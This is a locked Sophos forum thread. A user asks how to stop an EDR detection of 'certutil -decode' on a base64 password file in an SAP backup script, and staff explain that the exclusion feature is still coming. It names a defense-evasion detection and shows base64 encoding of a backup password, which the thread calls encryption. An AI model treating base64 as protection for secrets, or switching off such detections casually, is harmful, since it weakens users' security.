This discussion has been locked.
You can no longer post new replies to this discussion. If you have a question you can start a new discussion

Exclude Threat Detection "TA0005 - Defense Evasion"

Our SAP server’s  backup process, that is using certutil.exe, is detected as a defense evasion threat.

In details the detection is

Detection ID:                    WIN-EVA-PRC-CERTUTIL-DECODE-1
Command Line:              certutil -decode password.b64 password.txt
File Path:                           C:\Windows\System32\certutil.exe
Parent Command Line: C:\Windows\System32\cmd.exe /c "C:\Users\p01adm\scripts\backup_db.cmd P01 tlog Y:\sapbackup > backup_tlog.log 2 >&1!"
Mitre Tactics:                    TA0005  Defense Evasion
                                           T1140   Deobfuscate/Decode Files or Information

 I've tried to exclude certutil.exe with an exclusion in the Threat Protection device policy, but it not works.

How can I disable this detection?

Thanks.



This thread was automatically locked due to age.
  • Hi Colsam,

    Thanks for reaching out to the Sophos Community Forum. 

    Allow me some time to inquire with our team regarding your question and I'll update you here. 

    Kushal Lakhan
    Team Lead, Global Community Support
    Connect with Sophos Support, get alerted, and be informed.
    If a post solves your question, please use the "Verify Answer" button.
    The New Home of Sophos Support Videos!  Visit Sophos Techvids
  • The exclusions in Threat Protection policy will not suppress EDR/XDR detections. We expect to allow customer suppression of detections in the first quarter of the new year. (As always, roadmaps are subject to change.) In the meantime, I will pass this info along to our detections team to determine whether a global suppression or change to the rule is warranted in this case.

  • That's a tough one -- as certutil is often used for evil purposes (I understand, not in your case) --- question about your backups -- is this a SAP native app for backup that is calling certutil, a script you (or someone else wrote), or a commercial backup application, that is leveraging certutil?  Just curious so I can keep an eye out for it as a MSP.

    CTO, Convergent Information Security Solutions, LLC

    https://www.convergesecurity.com

    Sophos Platinum Partner

    --------------------------------------

    Advice given as posted on this forum does not construe a support relationship or other relationship with Convergent Information Security Solutions, LLC or its subsidiaries.  Use the advice given at your own risk.

  • I see it is using certutil to encrypt / decrypt what looks like the password for the backup to complete... I have seen some customers with custom powershell scripts that decode / encode things in base64 trigger events too.

    CTO, Convergent Information Security Solutions, LLC

    https://www.convergesecurity.com

    Sophos Platinum Partner

    --------------------------------------

    Advice given as posted on this forum does not construe a support relationship or other relationship with Convergent Information Security Solutions, LLC or its subsidiaries.  Use the advice given at your own risk.

  • You're right, we use certutil do encrypt / decrypt the password for the backup. I'll wait for the feature to suppress EDR/XDR detections.

    Thanks for your replies.

  • Thank you, I'll wait for this new feature.